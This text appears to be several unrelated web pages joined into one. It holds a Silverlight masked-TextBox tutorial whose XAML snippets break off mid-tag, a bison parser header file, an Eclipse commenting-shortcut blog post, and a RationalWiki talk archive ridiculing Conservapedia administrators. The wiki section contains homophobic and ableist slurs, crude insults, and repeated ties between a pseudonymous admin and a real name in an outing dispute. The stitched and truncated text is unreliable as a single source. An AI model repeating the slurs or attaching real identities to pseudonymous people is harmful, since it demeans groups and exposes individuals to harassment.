Known Folders Windows Vista introduces new storage scenarios and a new user profile namespace. To address these new factors, the older system of referring to standard folders by a CSIDL value has been replaced. As of Windows Vista, those folders are referenced by a new set of GUID values called Known Folder IDs. The Known Folder system provides these advantages: - Independent software vendors (ISVs) can extend the set of Known Folder IDs with their own. They can define folders, give them IDs, and register them with the system. CSIDL values could not be extended. - All Known Folders on a system can be enumerated. No API provided this functionality for CSIDL values. See IKnownFolderManager::GetFolderIds for more information. - A known folder added by an ISV can add custom properties that allow it to explain its purpose and intended use. - Many known folders can be redirected to new locations, including network locations. Under the CSIDL system, only the My Documents folder could be redirected. - Known folders can have custom handlers for use during creation or deletion. The CSIDL system and APIs that make use of CSIDL values are still supported for compatibility. However, it is not recommended to use them in any new development. The following topics discuss the specifics of the Known Folders system. - Working with Known Folders in Applications - How to Extend Known Folders with Custom Folders - KNOWNFOLDERID The following reference pages explain the Win32 Known Folders functions, which can be used to retrieve the location of Known Folders or redirect them to a new location. These functions replace older Win32 functions. The new functions are provided to give equivalent behavior to the old functions, but each new function is also duplicated by a Component Object Model (COM) API. The following reference pages explain the COM Known Folders APIs, which provide all of the functionality of the Win32 APIs listed above, plus add the ability to enumerate all Known Folders, access Known Folder properties, and extend the standard set of Known Folders. A C++ sample that demonstrates the Known Folder APIs is included in the Windows Software Development Kit (SDK). Once you have installed the Windows SDK on your computer, the sample can be found under %ProgramFiles%\Microsoft SDKs\Windows\v6.0\Samples\WinUI\Shell\AppPlatform\KnownFolders. Related topics
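To make the description concrete, a minimal C++ sketch of asking the shell for a known folder's path might look like the following (error handling trimmed; it assumes Windows Vista or later, the Windows SDK headers, and linking against shell32.lib — treat it as an illustration rather than the canonical SDK sample mentioned above):

#include <windows.h>
#include <shlobj.h>        // SHGetKnownFolderPath
#include <knownfolders.h>  // FOLDERID_Documents and the other KNOWNFOLDERID values
#include <stdio.h>

int main()
{
    PWSTR path = NULL;

    // Look up the per-user Documents folder by its KNOWNFOLDERID.
    HRESULT hr = SHGetKnownFolderPath(FOLDERID_Documents, 0, NULL, &path);
    if (SUCCEEDED(hr))
    {
        wprintf(L"Documents folder: %s\n", path);
        CoTaskMemFree(path);  // the caller must free the returned string
    }
    return 0;
}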
https://docs.microsoft.com/en-us/windows/desktop/shell/known-folders
CC-MAIN-2019-09
refinedweb
379
54.42
The Debug class defines a number of debug levels and a static public member giving the current debug level in a run. More... Debug #include <Debug.h> (requires the existence of fpu_controll.h on the platform). fpu_controll.h The Debug class defines a number of debug levels and a static public member giving the current debug level in a run. Definition at line 21 of file Debug.h. The different debug levels. No debugging. Lowest debug level. Some events are printed out. Higher debug level. All events are printed out. Highest possible debug level. Definition at line 28 of file Debug.h. Switch on or off a given debug item. If no such item exists, one will be created. Check if a given item should be debugged. If no such item is present false is returned. Definition at line 71 of file Debug.h. References full, maskFpuDenorm(), maskFpuDivZero(), maskFpuErrors(), maskFpuInvalid(), maskFpuOverflow(), maskFpuUnderflow(), noDebug, unmaskFpuDenorm(), unmaskFpuDivZero(), unmaskFpuErrors(), unmaskFpuInvalid(), unmaskFpuOverflow(), and unmaskFpuUnderflow(). A vector of switches indicating whether a given debug item is switched on or not. The index of a debug item has no special meaning. An implementor may assume that a given number corresponds to a certain request for debug output, but cannot be sure that someone else uses that number for some other purpose. Definition at line 54 of file Debug.h. If true, the debug level has been set from the outside from the calling program. This would then override any debug settings in the event generator. Definition at line 45 of file Debug.h.
https://thepeg.hepforge.org/doxygen/classThePEG_1_1Debug.html
CC-MAIN-2018-39
refinedweb
257
53.27
American football players "blocking" the kick, not "intercepting." Special thanks to Luciano Ramalho. I learned most of the knowledge about descriptors from his workshop in PyBay 2017 Have you seen this code or maybe have written code like this? from sqlalchemy import Column, Integer, String class User(Base): id = Column(Integer, primary_key=True) name = Column(String) This code snippet partially comes from the tutorial of a popular ORM package called SQLAlchemy. If you ever wonder why the attributes id and name aren't passed into the __init__ method and bind to the instance like regular class does, this post is for you. This post starts with explaining descriptors, why to use them, how to write them in previous Python versions (<= 3.5,) and finally writing them in Python 3.6 with the new feature described in PEP 487 -- Simpler customisation of class creation If you are in a hurry or you just want to know what's new, scroll all the way down to the bottom of this article. You'll find the whole code. What are descriptors A great definition of descriptor is explained by Raymond Hettinger in Descriptor HowTo Guide: In general, a descriptor is an object attribute with “binding behavior”, one whose attribute access has been overridden by methods in the descriptor protocol. Those methods are __get__(), __set__(), and __delete__(). If any of those methods are defined for an object, it is said to be a descriptor. There are three ways to access an attribute. Let's say we have the a attribute on the object obj: - To lookup its value, some_variable = obj.a, - To change its value, obj.a = 'new value', or - To delete it, del obj.a Python is dynamic and flexible to allow users intercept the above expression/statement and bind behaviors to them. Why you want to use descriptors Let's see an example: class Order: def __init__(self, name, price, quantity): self.name = name self.price = price self.quantity = quantity def total(self): return self.price * self.quantity apple_order = Order('apple', 1, 10) apple_order.total() # 10 Despite the lack of proper documentation, there is a bug: apple_order.quantity = -10 apple_order.total # -10, too good of a deal! Instead of using getter and setter methods and break the APIs, let's use property to enforce quantity be positive: class Order: def __init__(self, name, price, quantity): self._name = name self.price = price self._quantity = quantity # (1) @property def quantity(self): return self._quantity @quantity.setter def quantity(self, value): if value < 0: raise ValueError('Cannot be negative.') self._quantity = value # (2) ... apple_order.quantity = -10 # ValueError: Cannot be negative We transformed quantity from a simple attribute to a non-negative property. Notice line (1) that the attribute are renamed to _quantity to avoid line (2) getting a RecursionError. Are we done? Hell no. We forgot about the price attribute cannot be negative neither. It might be attempting to just create another property for price, but remember the DRY principle: when you find yourself doing the same thing twice, it's a good sign to extract the reusable code. Also, in our example, there might be more attributes need to be added into this class in the future. Repeating the code isn't fun for the writer or the reader. Let's see how to use descriptors to help us. 
How to write descriptors With the descriptors in place, our new class definition would become: class Order: price = NonNegative('price') # (3) quantity = NonNegative('quantity') Notice the class attributes defined before the __init__ method? It's a lot like the SQLAlchemy example showed on the very beginning of this post. This is where we are heading. We need to define the NonNegative class and implement the descriptor protocols. Here's how: class NonNegative: def __init__(self, name): self.name = name # (4) def __get__(self, instance, owner): return instance.__dict__[self.name] # (5) def __set__(self, instance, value): if value < 0: raise ValueError('Cannot be negative.') instance.__dict__[self.name] = value # (6) Line (4): the name attribute is needed because when the NonNegative object is created on line (3), the assignment to attribute named price hasn't happen yet. Thus, we need to explicitly pass the name price to the initializer of the object to use as the key for the instance's __dict__. Later, we'll see how in Python 3.6+ we can avoid the redundancy. The redundancy could be avoid in earlier versions of Python, but I think this would take too much effort to explain and is not the purpose of this post. Thus, not included. Line (5) and (6): instead of using builtin function getattr and setattr, we need to reach into the __dict__ object directly, because the builtins would be intercepted by the descriptor protocols too and cause the RecursionError. Welcome to Python 3.6+ We are still repeating ourself in line (3). How do I get a cleaner API to use such that we write: class Order: price = NonNegative() quantity = NonNegative() def __init__(self, name, price, quantity): ... Let's look at the new descriptor protocol in Python 3.6: object.__set_name__(self, owner, name) - Called at the time the owning class owner is created. The descriptor has been assigned to name. With this protocol, we could remove the __init__ and bind the attribute name to the descriptor: class NonNegative: ... def __set_name__(self, owner, name): self.name = name To put all the codes together: class NonNegative: def __get__(self, instance, owner): return instance.__dict__[self.name] def __set__(self, instance, value): if value < 0: raise ValueError('Cannot be negative.') instance.__dict__[self.name] = value def __set_name__(self, owner, name): self.name = name class Order: price = NonNegative() quantity = NonNegative() Conclusion Python is a general purpose programming language. I love that it not only has very powerful features that are highly flexible and could possibly bend the language tremendously (e.g. Meta Classes,) but also has high-level APIs/protocols to serve 99% of the needs (e.g. Descriptors.) I believe there's the right tool for the job. Descriptors are clearly the right tool for binding behaviors to attributes. Although Meta Classes could potentially do the same thing, Descriptor could solve the problem more gracefully. It's also pleasing to see Python evolve for serving general people's needs better. Here's my conclusion: - Python 3.6 is by far the greatest Python. - Descriptors are used to bind behaviors to accessing attributes. Discussion (4) Have you examined how well auto-complete and type-inference works when using descriptors for various IDEs? This is always the problem that I run into when working with new language features unfortunately. Hey Seth, no I haven't, although I feel most IDSs should have good support on descriptors since it's a well established feature from Python 2.2. 
The only new feature here is the __set_name__protocol that's been added since Python 3.6. Use WeakKeyDictionary instead of ordinary dictionaries when creating descriptor classes, else you will run into problems (bugs will appear) when you start to delete instances, as those instance won't get garbage deleted: Watch this: youtube.com/watch?v=lmcgtUw5djw time: (15:00) That's what I was looking for. Thank's a lot.
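For completeness, a rough sketch of the WeakKeyDictionary variant suggested in that last comment — per-instance storage keyed on the instance itself, so entries vanish when instances are garbage collected — could look like this (an illustration, not code from the article):

import weakref

class NonNegative:
    def __init__(self):
        # One mapping per descriptor; the keys are the owning instances.
        self._values = weakref.WeakKeyDictionary()

    def __get__(self, instance, owner):
        if instance is None:
            return self
        return self._values.get(instance, 0)

    def __set__(self, instance, value):
        if value < 0:
            raise ValueError('Cannot be negative.')
        self._values[instance] = value

class Order:
    price = NonNegative()
    quantity = NonNegative()

order = Order()
order.price = 5
try:
    order.quantity = -1
except ValueError as exc:
    print(exc)  # Cannot be negative.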
https://dev.to/dawranliou/writing-descriptors-in-python-36
CC-MAIN-2021-39
refinedweb
1,203
57.67
DMD 2.082.0 was released over the weekend. There were 28 major changes and 76 closed Bugzilla issues in this release, including some very welcome improvements in the toolchain. Head over to the download page to pick up the official package for your platform and visit the changelog for the details. Tooling improvements While there were several improvements and fixes to the compiler, standard library, and runtime in this release, there were some seemingly innocuous quality-of-life changes to the tooling that are sure to be greeted with more enthusiasm. DUB gets dubbier DUB, the build tool and package manager for D that ships with DMD, received a number of enhancements, including better dependency resolution, variable support in the build settings, and improved environment variable expansion. Arguably the most welcome change will be the removal of the regular update check. Previously, DUB would check for dependency updates once a day before starting a project build. If there was no internet connection, or if there were any errors in dependency resolution, the process could hang for some time. With the removal of the daily check, upgrades will only occur when running dub upgrade in a project directory. Add to that the brand new --dry-run flag to get a list of any upgradable dependencies without executing the upgrades. Signed binaries for Windows For quite some time users of DMD on Windows have had the annoyance of seeing a warning from Windows Smartscreen when running the installer, and the occasional false positive from AntiVirus software when running DMD. Now those in the Windows D camp can do a little victory dance, as all of the binaries in the distribution, including the installer, are signed with the D Language Foundation’s new code signing certificate. This is one more quality-of-life issue that can finally be laid to rest. On a side note, the cost of the certificate was the first expense entered into our Open Collective page. Compiler and libraries Many of the changes and updates in the compiler and library department are unlikely to compel anyone to shout from the rooftops, but a handful are nonetheless notable. The compiler One such is an expansion of the User-Defined Attribute syntax. Previously, these were only allowed on declarations. Now, they can be applied to function parameters: // Previously, it was illegal to attach a UDA to a function parameter void example(@(22) string param) { // It's always been legal to attach UDAs to type, variable, and function declarations. @(11) string var; pragma(msg, [__traits(getAttributes, var)] == [11]); pragma(msg, [__traits(getAttributes, param)] == [22]); } The same goes for enum members (it’s not explicitly listed in the highlights at the top of the changelog, but is mentioned in the bugfix list): enum Foo { @(10) one, @(20) two, } void main() { pragma(msg, [__traits(getAttributes, Foo.one)] == [10]); pragma(msg, [__traits(getAttributes, Foo.two)] == [20]); } The DasBetterC subset of D is enhanced in this release with some improvements. It’s now possible to use array literals in initializers. Previously, array literals required the use of TypeInfo, which is part of DRuntime and therefore unavailable in -betterC mode. Moreover, comparing arrays of structs is now supported and comparing arrays of byte-sized types should no longer generate any linker errrors. 
import core.stdc.stdio; struct Sint { int x; this(int v) { x = v;} } extern(C) void main() { // No more TypeInfo error in this initializer Sint[6] a1 = [Sint(1), Sint(2), Sint(3), Sint(1), Sint(2), Sint(3)]; foreach(si; a1) printf("%i\n", si.x); // Arrays/slices of structs can now be compared assert(a1[0..3] == a1[3..$]); // No more linker error when comparing strings, either explicitly // or implicitly such as in a switch. auto s = "abc"; switch(s) { case "abc": puts("Got a match!"); break; default: break; } // And the same goes for any byte-sized type char[6] a = [1,2,3,1,2,3]; assert(a[0..3] >= a[3..$]); puts("All the asserts passed!"); } DRuntime Another quality-of-life fix, this one touching on the debugging experience, is a new run-time flag that can be passed to any D program compiled against the 2.082 release of the runtime or later, --DRT-trapException=0. This allows exception trapping to be disabled from the command line. Previously, this was supported only via a global variable, rt_trapExceptions. To disable exception trapping, this variable had to be set to false before DRuntime gained control of execution, which meant implementing your own extern(C) main and calling _d_run_main to manually initialize DRuntime which, in turn, would run the normal D main—all of which is demonstrated in the Tip of the Week from the August 7, 2016, edition of This Week in D (you’ll also find there a nice explanation of why you might want to disable this feature. HINT: running in your debugger). A command-line flag is sooo much simpler, no? Phobos The std.array module has long had an array function that can be used to create a dynamic array from any finite range. With this release, the module gains a staticArray function that can do the same for static arrays, though it’s limited to input ranges (which includes other arrays). When the length of a range is not knowable at compile time, it must be passed as a template argument. Otherwise, the range itself can be passed as a template argument. import std.stdio; void main() { import std.range : iota; import std.array : staticArray; auto input = 3.iota; auto a = input.staticArray!2; pragma(msg, is(typeof(a) == int[2])); writeln(a); auto b = input.staticArray!(long[4]); pragma(msg, is(typeof(b) == long[4])); writeln(b); } September pumpkin spice Participation in the #dbugfix campaign for this cycle was, like last cycle, rather dismal. Even so, I’ll have an update on that topic later this month in a post of its own. Three of eight applicants were selected for the Symmetry Autumn of Code, which officially kicked off on September 1. Stay tuned here for a post on that topic as well. The blog has been quiet for a few weeks, but the gears are slowly and squeakily starting to grind again. Other posts lined up for this month include the next long-overdue installment in the GC Series and the launch of a new ‘D in Production’ profile.
https://dlang.org/blog/2018/09/04/dmd-2-082-0-released/
CC-MAIN-2022-27
refinedweb
1,065
61.26
This will be a PHP-based website system. It will have an XML database for all content (no need for database software). Also it will have the ability to use a template system that can easily accommodate Flash and WYSIWYG .tpl templates.

flyweb created the I am submitting a PNG transparency fix for IE artifact
flyweb commented on the unable to parse sections from xml file artifact
Anonymous created the unable to parse sections from xml file artifact

+converted symbols in html elements to greek equivalent so it will not break xml. Probably make a bbcode type implementation later on or use XML namespace.
+directories are now created on installation process.
+an attempt at prepping S-CMS for different ...

flyweb commented on the Possible security risk in config.xml artifact
flyweb created the Possible security risk in config.xml artifact

In this new version we have updated the database engine from active-link.org. This gives us many more functions to work with. The installer is about 20% complete. We now have a new Smarty plugin to handle the database queries depending on pagename.php ...

flyweb commented on the RE: Preliminary install forum thread
http://sourceforge.net/projects/simpletoncms/
crawl-002
refinedweb
215
58.18
Spin Wait Spin Wait Spin Wait Spin Wait Struct Definition Provides support for spin-based waiting. public value class SpinWait public struct SpinWait type SpinWait = struct Public Structure SpinWait - Inheritance - Examples The following example shows how to use a SpinWait: using System; using System.Threading; using System.Threading.Tasks; class SpinWaitDemo { // Demonstrates: // SpinWait construction // SpinWait.SpinOnce() // SpinWait.NextSpinWillYield // SpinWait.Count static void Main() { bool someBoolean = false; int numYields = 0; // First task: SpinWait until someBoolean is set to true Task t1 = Task.Factory.StartNew(() => { SpinWait sw = new SpinWait(); while (!someBoolean) { // The NextSpinWillYield property returns true if // calling sw.SpinOnce() will result in yielding the // processor instead of simply spinning. if (sw.NextSpinWillYield) numYields++; sw.SpinOnce(); } // As of .NET Framework 4: After some initial spinning, SpinWait.SpinOnce() will yield every time. Console.WriteLine("SpinWait called {0} times, yielded {1} times", sw.Count, numYields); }); // Second task: Wait 100ms, then set someBoolean to true Task t2 = Task.Factory.StartNew(() => { Thread.Sleep(100); someBoolean = true; }); // Wait for tasks to complete Task.WaitAll(t1, t2); } } Imports System.Threading Imports System.Threading.Tasks Module SpinWaitDemo ' Demonstrates: ' SpinWait construction ' SpinWait.SpinOnce() ' SpinWait.NextSpinWillYield ' SpinWait.Count Private Sub SpinWaitSample() Dim someBoolean As Boolean = False Dim numYields As Integer = 0 ' First task: SpinWait until someBoolean is set to true Dim t1 As Task = Task.Factory.StartNew( Sub() Dim sw As New SpinWait() While Not someBoolean ' The NextSpinWillYield property returns true if ' calling sw.SpinOnce() will result in yielding the ' processor instead of simply spinning. If sw.NextSpinWillYield Then numYields += 1 End If sw.SpinOnce() End While ' As of .NET Framework 4: After some initial spinning, SpinWait.SpinOnce() will yield every time. Console.WriteLine("SpinWait called {0} times, yielded {1} times", sw.Count, numYields) End Sub) ' Second task: Wait 100ms, then set someBoolean to true Dim t2 As Task = Task.Factory.StartNew( Sub() Thread.Sleep(100) someBoolean = True End Sub) ' Wait for tasks to complete Task.WaitAll(t1, t2) End Sub End Module Remarks SpinWait encapsulates common spinning logic. On single-processor machines, yields are always used instead of busy waits, and on computers with Intel processors employing Hyper-Threading technology, it helps to prevent hardware thread starvation. SpinWait encapsulates a good mixture of spinning and true yielding. SpinWait is a value type, which means that low-level code can utilize SpinWait without fear of unnecessary allocation overheads. SpinWait is not generally useful for ordinary applications. In most cases, you should use the synchronization classes provided by the .NET Framework, such as Monitor. For most purposes where spin waiting is required, however, the SpinWait type should be preferred over the Thread.SpinWait method. Properties Methods Applies to Thread Safety While SpinWait is designed to be used in concurrent applications, it is not designed to be used from multiple threads concurrently. SpinWait members are not thread-safe. If multiple threads must spin, each should use its own instance of SpinWait. See also Feedback We'd love to hear your thoughts. Choose the type you'd like to provide: Our feedback system is built on GitHub Issues. Read more on our blog.
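The remarks above point out that SpinWait is mainly useful inside low-level synchronization code rather than ordinary applications; a hedged sketch of what that typically looks like — a tiny test-and-set lock, for illustration only — is:

using System.Threading;

public class SimpleSpinLock
{
    private int _taken;  // 0 = free, 1 = held

    public void Enter()
    {
        SpinWait spinner = new SpinWait();
        // Atomically try to flip the flag from 0 to 1; spin politely until it succeeds.
        while (Interlocked.CompareExchange(ref _taken, 1, 0) != 0)
        {
            spinner.SpinOnce();  // busy-spins at first, then starts yielding the processor
        }
    }

    public void Exit()
    {
        Interlocked.Exchange(ref _taken, 0);
    }
}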
https://docs.microsoft.com/en-us/dotnet/api/system.threading.spinwait?redirectedfrom=MSDN&view=netframework-4.7.2
CC-MAIN-2019-09
refinedweb
509
60.61
TextBox( ComboBox, Masked TextBoxand More) s Inside thes Inside the - Introduction - Button - Predefined Buttons, ComboBoxand Erase Inside the TextBox - Having a Silverlight Headache!! - Formatting Behavior of STextBox - Masked Behavior of STextBox - Using a Maskor FormatLibrary (and International Features) - Validation of Data and Error Handling TextBox. STextBox is still a work in progress. As improvements become available, I will post new versions. I assume Microsoft will eventually release ComboBox and other functionality that will replace this control. Have fun! Many controls were included with the recent release of Silverlight 2b1, however a few controls were noticeably missing. For instance there is no ComboBox, no Masked TextBox and no TabControl. Since it will be very hard to develop a business application without such controls, we need to come up with some custom controls. The control presented here ( STextBox) helps out: By making the code public, I hope others can help to further improve the concept. When such improvements become available, I'll post them. I also have a working Tab Control. Once it is more “mature”, I might post that as well. Selectively I'll explain some of the features, workarounds and problems I encountered while creating this control. (Please review the source code and code samples for complete information.) Where possible, I'll refer to links that helped me out and/or other people who came up with suggestions or sample code. Some of the code is from the Microsoft source code, please note their license requirement (it is in the files to which it applies): // Copyright © Microsoft Corporation. // This source is subject to the Microsoft Source License for Silverlight Controls(March 2008 Release). // Please see for details. On my personal code I have no license requirement. Please use as you see fit! I'll take credits but accept no responsibility for failures. (What’s new, right?) Just as an example, for the longest time I have searched for a way to have the client display a byte array as an Image (using WCF, we receive an Image as a byte[] from the SQL database). That seems like a simple task, and while Image URLs work just fine displaying a JPG from a byte[] is next to impossible in ASP.NET (we used an HttpHandler –ashx-, but I just never appreciated the extra trip to the server). A few days ago I figured out how it is done in Silverlight 2.0 (I simply bind ImageSource to a slightly customized property): public ImageSource ThumbImage { get { if (Thumb == null) return null; if (Thumb.Bytes.IsEmpty()) return null; BitmapImage bitmap = new BitmapImage(); bitmap.SetSource(new MemoryStream(Thumb.Bytes)); return bitmap; } } I frequently use extension methods (like .IsEmpty() above). When you download the source code, you'll find them in the file SLHelpers.cs. After all, why type me.Visibility = Visibility.Visible when instead I can type me.Show(). Silverlight makes it easier to develop your own controls, so I spent a few days filling the gap in my “control library”. Microsoft was nice enough to release a mix08 source control library so we can peek at the way they created many of the standard controls ( TextBox and other basic elements are not included). The first thing I noticed was that Microsoft includes a Watermarked TextBox that actually does more than just provide a Watermark. 
It allows you to disable a TextBox (see top) and it has a FocusVisual so you can better see which TextBox has focus: However, strangely enough you cannot inherit your control from Watermarked TextBox for one major reason. The constructor calls a method SetStyle which loads the XAML code from the assembly and creates the control. SL2.0b1 does NOT allow you to load a Style more than once, so with a Style already loaded by the Watermarked TextBox constructor, there is not much you can do. For this reason, I have made a copy of this control (labelled SWatermarkedTextBox) with one minor but crucial change in it: protected virtual void SetStyle() { } Now we can override SetStyle, and enjoy the features of Enable/Disable, Watermark and focus at “no extra cost”: public class STextBox : SWatermarkedTextBox { } It is also interesting to see that WatermarkedTextBox does NOT use generic.xaml. Why would you want all your XAML code for controls to be in the same file anyway? Included with the sample code is a simple Page.XAML (notice the g: reference for the STextBox library): <UserControl x: <Grid x: </Grid> </UserControl> Within the UserControl you could also have a Canvas: <Canvas x: </Canvas> Figure 2 is the result of these lines: <g:STextBox x: <g:STextBox x: I have always enjoyed the 3rd party controls that would enable me to include all kinds of Buttons inside of the TextBox. Unlike Button which has a Content property and hence can be filled with anything you like, TextBox only has a Text property and does not allow you to fill the TextBox with other controls. In XAML, it looks like this: <g:STextBox x: <g:STextBox.Content> <StackPanel Orientation="Horizontal" Width="40" HorizontalAlignment="Left"> <Button x: <Button x: </StackPanel> </g:STextBox.Content> </g:STextBox> And it displays like this: One of the (failed) attempts I made was to have that collection respond to the usual Mouse events on the Buttons itself ( MouseOver, MouseClick). buttonElement.IsHitTestVisible = true; buttonElement.IsTabStop = tabStop; if buttonElement.Content is Control) { (buttonElement.Content as Control).IsHitTestVisible = true; (buttonElement.Content as Control).IsTabStop = tabStop; } Panel pnl = buttonElement.Content as Panel; if (pnl != null) { foreach (UIElement ctrl in pnl.Children) { if (ctrl is Control) { (ctrl as Control).IsHitTestVisible = true; (ctrl as Control).IsTabStop = tabStop; } } } That works fine to disable the TabStops on these buttons, but does nothing to make the content come alive ( HitTestVisible). So as a workaround, I handle mouse-over and mouse-click events inside the STextBox control. <g:STextBox x: <………> Hovering over one of the Buttons will change the mouse to “Hand” and when clicked, the ContentClick event will be executed. For example: private void Test6_ContentClick(object sender, RoutedEventArgs e) { if (sender == BLookup) "Lookup goes here".Alert(); if (sender == BHelp) "Help goes here".Alert(); } When adding a ListBox or an error indicator to the TextBox (as demonstrated below), we run into the same issue. The graphics work, but there is no keyboard or mouse control. It is for this reason that ListBox and error indicator are added to the parent control collection. We go up the control tree to find a Canvas or Grid where we can add these dynamic parts of STextBox. Adding these controls to the parent of STextBox works out fine, but it means we have to manually position the ListBox (or error indicator). Considering StackPanels, Grids, Margins etc., that is not an easy task. 
It works out in most cases I tested, but more complicated scenarios might fail to do proper positioning. The following XAML code demonstrates the predefined Button to erase the content of the TextBox ( EraseButtonName property): <g:STextBox x: <g:STextBox.Content> <Button x: </g:STextBox.Content> </g:STextBox> The following XAML code demonstrates the predefined Button for a DropDownList ( ComboBox): <Canvas> <g:STextBox x: <g:STextBox.Content> <Button x: </g:STextBox.Content> <g:STextBox.ListBoxContent> <ListBox x: <ListBoxItem Content="Option1"/> <ListBoxItem Content="Option2"/> <ListBoxItem Content="Option3"/> <ListBoxItem Content="Sample"/> <ListBoxItem Content="Option4"/> <ListBoxItem Content="Option5"/> <ListBoxItem Content="Option6"/> </ListBox> </g:STextBox.ListBoxContent> </g:STextBox> </Canvas> Some additional features: DropDownPosition, allows you to set where the ListBoxwill show in relationship to the TextBox(Top or Bottom and if it does not have the same width aligned to the right or the left). DropDownKey, sets the name of the hot-key that will show the ListBox(defaults to Down-key). StrictDropDown, when set to Truewill make the TextBoxentry ReadOnlyso the user can ONLY select values from the list. For the most part, keyboard control works as you would expect. There are a number of issues in the current setup: I was initially unable to make the correct initial item “Selected” in the dropdown. I fixed this with a Timer (the code is still in there since it is interesting to see this in Silverlight), but later I found a fix in SelectedIndexWorkAround. Using the mix08 samples from Mike Harsh, it was not very hard to enable the ListBox for scrolling with the mouse-wheel. An embedded JavaScript file takes care of the interaction and STextBox syncs the mouse-wheel events with the Listbox (if it has focus!). The weird thing with the current TabStop implementation, is that Silverlight attempts to Tab to controls that are not really visible. It is therefore important to set IsTabStop to false on anything that is not visible. For this reason, my extension methods on visibility ( .Hide(), .Show(), SetVisibility()) all call... private static void SyncTabStop(UIElement me, bool vis) { // for SL2.0b1, Collapsed with IsTabStop is a big issue... if (me == null) return; if (me is Control) { (me as Control).IsTabStop = vis; } else if (me is Border) { SyncTabStop((me as Border).Child, vis); } else if (me is Panel) { if (vis) (me as Panel).Children.StartTabKey(); else (me as Panel).Children.StopTabKey(); } } ... where StartTab and StopTab cycle through all children to set the IsTabStop property. Sadly once I make the ListBox visible I am unable to control TabStop behavior for the ListBox itself. Hence when you use Tab or Shift-Tab on the “popup” ListBox focus jumps to the addressbar or some other strange place. It would be nice if I could programmatically catch the Tab behavior and control it properly. This might sound similar but is not. When you look carefully at Figure 5, you see that the ListBox item “Sample” is selected, but the item “Option 1” has focus. I traced that to an oversight in the ListBox code where _tabOnceActiveElement is stubbornly reset to the first item no matter what you select. Only an actual mouse-click or keyboard event (up/down) can change this. So the strange behavior is that you open the listbox with keydown, but subsequent keyboard control will be based on the first item and not on the selected item. Now I also had a desire to retrieve the actual ListBoxItem. 
Now I also had a desire to retrieve the actual ListBoxItem. That seems easy, but if you DataBind the ListBox to some collection, the items of the ListBox are of your collection type and not of type ListBoxItem (the latter comes in handy for visual effects, focus etc.). Thirdly, I would like to get the ElementScrollViewer (for instance to adjust the Height of the ListBox based on the number of items). I did figure out the code that I would like to add to the ListBox to fix various features:

    public void Set_tabOnceActiveElement()
    {
        _tabOnceActiveElement = GetListBoxItemForObject(Items[SelectedIndex]);
        if (_tabOnceActiveElement != null) _tabOnceActiveElement.Focus();
    }

    public ListBoxItem Get_ListBoxItemForObject(object value)
    {
        return GetListBoxItemForObject(value);
    }

    public ScrollViewer Get_ElementScrollViewer()
    {
        return ElementScrollViewer;
    }

Normally I would have been able to make these simple adjustments by using reflection, and initially I attempted to do just that. BUT in Silverlight, reflection is not allowed to access any private/internal member and/or to Invoke any such method. That was much to my surprise, but is further outlined here: "In Silverlight, reflection cannot be used to access private types and members. If the access level of a type or member would prevent you from accessing it in statically compiled code, then you cannot access it dynamically by using reflection."

That, to me, is just very inconvenient and simply not in the .NET spirit. I can only assume there is some underlying major security risk that requires this limitation. It would not have been so bad if the Microsoft controls like ListBox did not mark almost ALL members at the lowest visibility (mostly internal due to unit testing).
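To make the restriction concrete, the snippet below is an illustration only (it is not from the original code, and the exact failure mode depends on the member): reflecting over the internal _tabOnceActiveElement member works on the desktop CLR but is blocked under Silverlight.

    // Illustration (assumption): reflecting over a non-public member of a platform assembly.
    System.Reflection.FieldInfo field = typeof(ListBox).GetField(
        "_tabOnceActiveElement",
        System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);
    // On the full .NET Framework this would let you read or set the member;
    // in Silverlight the access is blocked (a null result or a FieldAccessException),
    // which is why the copy-the-control approach below was tried instead.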
I subsequently tried to modify the Mix08 source code and create my own version of System.Windows.Control. That caused many undesirable side effects (the VS XAML previewer died) and I am not so sure the Mix08 source code is completely identical to the released version. Since I was successful in making a copy of the WatermarkedTextBox and reusing it after some minor changes (name and some resource strings), why not do that for ListBox…. However, ListBox does not work by itself; it is dependent on many of the other controls and could not be moved into my own control assembly without its buddies. After moving over what seems like half the control library, I gave up.

By just going through some normal form scenarios, I was quickly stuck on the next issue. I had several fields which would not display the way I liked. On an enum value with a dropdown ListBox, using a value converter worked fine. Isn't it great to use LINQ like this:

    public class DBCompanyEnumConverter : IValueConverter
    {
        public object Convert(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture)
        {
            if (CompanyEditor.Settings != null)
            {
                string name = (from e in CompanyEditor.Settings.CompanyEnums
                               where e.DBCompanyEnumId == (byte)value
                               select e.DBCompanyEnumName).FirstOrDefault();
                return name;
            }
            return "Type " + value.ToString();
        }

        public object ConvertBack(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture)
        {
            int Id = (from e in CompanyEditor.Settings.CompanyEnums
                      where e.DBCompanyEnumName == (string)value
                      select e.DBCompanyEnumId).FirstOrDefault();
            return (byte)Id;
        }
    }

BTW, in XAML you hook it up like this:

    <UserControl.Resources>
      <c:DBCompanyEnumConverter x:
    </UserControl.Resources>
    <……>
    <g:STextBox x:
      <g:STextBox.Content>
        <g:SButton x:
      </g:STextBox.Content>
      <g:STextBox.ListBoxContent>
        <ListBox Width="120" Height="140" DisplayMemberPath="DBCompanyEnumName">
        </ListBox>
      </g:STextBox.ListBoxContent>
    </g:STextBox>

Using standard .NET formatting, you can do a lot (when you use the Format property, bind to Value instead of Text!!). In XAML, it looks like this (and binds to a double Markup):

    <g:STextBox x:

    private void OnValueChanged()
    {
        // also see OnLostFocus for reverse mapping...
        if (Value == null)
            base.Text = "";
        else if (!String.IsNullOrEmpty(_Format))
        {
            // tips see // and
            base.Text = String.Format(TextBoxCulture, "{0:" + _Format + "}", Value);
        }
        else
            base.Text = Value.ToString();
    }

When Focus is lost, STextBox attempts to do the reverse mapping (from Text and Format string to the Value object):

    if (!String.IsNullOrEmpty(_Format))
    {
        // here handle any special "DEFORMATTING" tricks so the generic Convert.ChangeType will work...
        if (_Format.Contains("#%") || _Format.Contains("9%") ||
            _Format.Contains("#'%") || _Format.Contains("9'%"))   // % sign optional
        {
            input = input.Replace("%", "");
            <....>
        }
    }
    <validation code>
    if (error == null)
    {
        Value = Convert.ChangeType(input, Value.GetType(), TextBoxCulture); // Value setter can also throw validation errors !!
    }

Combined with a Value (see Formatting Behavior) or with a Text property binding, you can use a Mask. When you bind to Value, as opposed to Text, STextBox will bind to a CLEAN version of the Text (where all formatting characters are removed).

    <g:STextBox x:

Displays like this:

